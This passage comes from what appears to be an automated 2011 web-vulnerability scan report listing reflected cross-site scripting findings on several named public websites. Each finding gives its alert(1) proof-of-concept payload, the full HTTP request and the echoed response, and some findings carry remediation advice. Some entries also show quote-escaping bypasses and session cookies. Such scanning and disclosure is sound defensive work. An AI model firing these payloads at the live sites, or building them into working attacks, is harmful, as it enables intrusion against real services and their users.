Path:
/sections/traffic-events/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ccbfe'><script>alert(1)</script>5970f590b45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/traffic-events/?ccbfe'><script>alert(1)</script>5970f590b45=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:29:01 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:39:01 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 42040
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... <a href='/sections/traffic-events/?ccbfe'><script>alert(1)</script>5970f590b45=1'> ...[SNIP]...
4.847. http://www.cbs6albany.com/sections/traffic/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/traffic/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 60e3e'><script>alert(1)</script>147cbe0ed3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/traffic/?60e3e'><script>alert(1)</script>147cbe0ed3a=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:28:22 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:38:22 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 28936
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
4.848. http://www.cbs6albany.com/sections/tvlistings/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/tvlistings/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18fdb'><script>alert(1)</script>ea31e14ecf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/tvlistings/?18fdb'><script>alert(1)</script>ea31e14ecf8=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:27:07 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:37:07 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 23684
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
4.849. http://www.cbs6albany.com/sections/videocopies/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/videocopies/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5e7b0'><script>alert(1)</script>20ab6d60dc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/videocopies/?5e7b0'><script>alert(1)</script>20ab6d60dc4=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:30:19 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:40:19 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 42233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... <a href='/sections/videocopies/?5e7b0'><script>alert(1)</script>20ab6d60dc4=1'> ...[SNIP]...
4.850. http://www.cbs6albany.com/sections/weather/7day/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/weather/7day/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 546eb'><script>alert(1)</script>a6747eb34cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/weather/7day/?546eb'><script>alert(1)</script>a6747eb34cf=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:27:20 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:37:20 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 24633
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
4.851. http://www.cbs6albany.com/sections/web-links/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/web-links/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7fb2a'><script>alert(1)</script>adf56b952dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/web-links/?7fb2a'><script>alert(1)</script>adf56b952dc=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:28:22 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:38:22 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 59509
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... <a href='/sections/web-links/?7fb2a'><script>alert(1)</script>adf56b952dc=1'> ...[SNIP]...
4.852. http://www.cbs6albany.com/sections/wrgb-talent/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cbs6albany.com
Path:
/sections/wrgb-talent/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1abcc'><script>alert(1)</script>d146c5acfd8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sections/wrgb-talent/?1abcc'><script>alert(1)</script>d146c5acfd8=1 HTTP/1.1 Host: www.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:29:16 GMT Server: Apache Cache-Control: max-age=600 Expires: Sat, 29 Jan 2011 04:39:16 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 27008
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
4.853. http://www.collegeanduniversity.net/herald/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.collegeanduniversity.net
Path:
/herald/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bc02"><script>alert(1)</script>f6e0bec01de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /herald/?1bc02"><script>alert(1)</script>f6e0bec01de=1 HTTP/1.1 Host: www.collegeanduniversity.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 04:30:35 GMT Server: Apache Set-Cookie: CFID=23963352;expires=Mon, 21-Jan-2041 04:30:36 GMT;path=/ Set-Cookie: CFTOKEN=d929d8f4b82db578-D009724A-19B9-F336-D8F485B26C5987DC;expires=Mon, 21-Jan-2041 04:30:36 GMT;path=/ Set-Cookie: JSESSIONID=22306a9c07e3ea57fd98291165c132d6aa47;path=/ Set-Cookie: CUNET.SHOWDEBUG=0;path=/ Set-Cookie: CU2005FRONTAPPKEY.SHOWDEBUG=0;path=/ Set-Cookie: CID=175;expires=Mon, 21-Jan-2041 04:30:36 GMT;path=/ P3P: CP='ADMa DEVa OUR IND DSP NON COR' Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28431
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Find Online College Degrees - Top Online Universities at Collegeanduniversity.net</title> <meta name="Descriptio ...[SNIP]... <input type="hidden" name="ReturnURL" value="/herald/index.cfm?1bc02"><script>alert(1)</script>f6e0bec01de=1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b1c9a<script>alert(1)</script>3ef0ba5983c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videoad/kD3_P_IRSdu0NijksWoruwb1c9a<script>alert(1)</script>3ef0ba5983c/Chevrolet-LMA HTTP/1.1 Host: www.mixpo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Date: Sat, 29 Jan 2011 04:37:23 GMT Connection: close
<!DOCTYPE html> <html> <head> <title>Mixpo: Online VideoAds that Drive Response </title> <link rel="SHORTCUT ICON" href="/favicon.ico" type="image/x-icon" /> <meta name="description" content=" Ma ...[SNIP]... <p>Landing page, cannot find container for /videoad/kD3_P_IRSdu0NijksWoruwb1c9a<script>alert(1)</script>3ef0ba5983c/Chevrolet-LMA</p> ...[SNIP]...
The value of the searchtext request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c656\"%3balert(1)//75842e444dc was submitted in the searchtext parameter. This input was echoed as 2c656\\";alert(1)//75842e444dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /search.aspx?searchtext=2c656\"%3balert(1)//75842e444dc HTTP/1.1 Host: www.moxiesoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 14:06:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 26001
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" > <head id="Head1"><link re ...[SNIP]... <![CDATA[ /*Clear Search Cookie*/EkSearch.clrCookie();/*Set search results*/document.getElementById('__ecmsearchresult$').innerHTML="Your search for 2c656\\";alert(1)//75842e444dc - did not match any documents.<br /> ...[SNIP]...
The value of the searchtext request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3631'%3balert(1)//20ecdcf8d9 was submitted in the searchtext parameter. This input was echoed as a3631';alert(1)//20ecdcf8d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search.aspx?searchtext=a3631'%3balert(1)//20ecdcf8d9 HTTP/1.1 Host: www.moxiesoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 14:06:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 25990
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70f75'%3balert(1)//84f766b9c15 was submitted in the REST URL parameter 1. This input was echoed as 70f75';alert(1)//84f766b9c15 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 14:10:58 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11ddd'%3balert(1)//e0aca46f7df was submitted in the REST URL parameter 1. This input was echoed as 11ddd';alert(1)//e0aca46f7df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs11ddd'%3balert(1)//e0aca46f7df/rangers/2011/01/live-chat-wednesday-at-2-pm HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 14:11:19 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28224'%3b7ef459ee8f9 was submitted in the REST URL parameter 1. This input was echoed as 28224';7ef459ee8f9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs70f7528224'%3b7ef459ee8f9/ HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296227725346:ss=1296227725346; __vrf=75ibpjczis64gvwq;
Response (redirected)
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 15:06:40 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en
The value of the bid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 32aad%3balert(1)//a80c7501128 was submitted in the bid parameter. This input was echoed as 32aad;alert(1)//a80c7501128 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsfb/embed.php?pid=3922&bid=212332aad%3balert(1)//a80c7501128 HTTP/1.1 Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var IMAGE_ROOT = 'http://www.paperg.com/beta/'; var flyerboard_root = 'http://www.paperg.com/jsfb/'; var remote_ip = '173.193.214.243'; var view = ''; var edit = '0'; var EMBED_URL212332aad;alert(1)//a80c7501128 = 'http://www.paperg.com/jsfb/embed.php?pid=3922&bid=212332aad%3balert(1)//a80c7501128';
//-- getting all script elements from document var scripts = document.getElementsByTagName('script'); ...[SNIP]...
The value of the bid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61da6'-alert(1)-'499123cfafb was submitted in the bid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsfb/embed.php?pid=3922&bid=212361da6'-alert(1)-'499123cfafb HTTP/1.1 Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var IMAGE_ROOT = 'http://www.paperg.com/beta/'; var flyerboard_root = 'http://www.paperg.com/jsfb/'; var remote_ip = '173.193.214.243'; var view = ''; var edit = '0'; var EMBED_URL212361da6'-alert(1)-'499123cfafb = 'http://www.paperg.com/jsfb/embed.php?pid=3922&bid=212361da6'-alert(1)-'499123cfafb';
//-- getting all script elements from document var scripts = document.getElementsByTagName('script');
//-- grabbing our script element var scriptEl = scripts[ scripts.length - 1 ];
...[SNIP]...
4.862. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.paperg.com
Path:
/jsfb/embed.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3fd3'-alert(1)-'e011e92194 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsfb/embed.php?pid=3922&bid=2123&d3fd3'-alert(1)-'e011e92194=1 HTTP/1.1 Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var IMAGE_ROOT = 'http://www.paperg.com/beta/'; var flyerboard_root = 'http://www.paperg.com/jsfb/'; var remote_ip = '173.193.214.243'; var view = ''; var edit = '0'; var EMBED_URL2123 = 'http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123&d3fd3'-alert(1)-'e011e92194=1';
//-- getting all script elements from document var scripts = document.getElementsByTagName('script');
//-- grabbing our script element var scriptEl = scripts[ scripts.length - 1 ]; ...[SNIP]...
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d87ab'-alert(1)-'c3e491e2d18 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsfb/embed.php?pid=3922d87ab'-alert(1)-'c3e491e2d18&bid=2123 HTTP/1.1 Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
var IMAGE_ROOT = 'http://www.paperg.com/beta/'; var flyerboard_root = 'http://www.paperg.com/jsfb/'; var remote_ip = '173.193.214.243'; var view = ''; var edit = '0'; var EMBED_URL2123 = 'http://www.paperg.com/jsfb/embed.php?pid=3922d87ab'-alert(1)-'c3e491e2d18&bid=2123';
//-- getting all script elements from document var scripts = document.getElementsByTagName('script');
//-- grabbing our script element var scriptEl = scripts[ scripts.length ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90702"><a>8af2ecf874f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
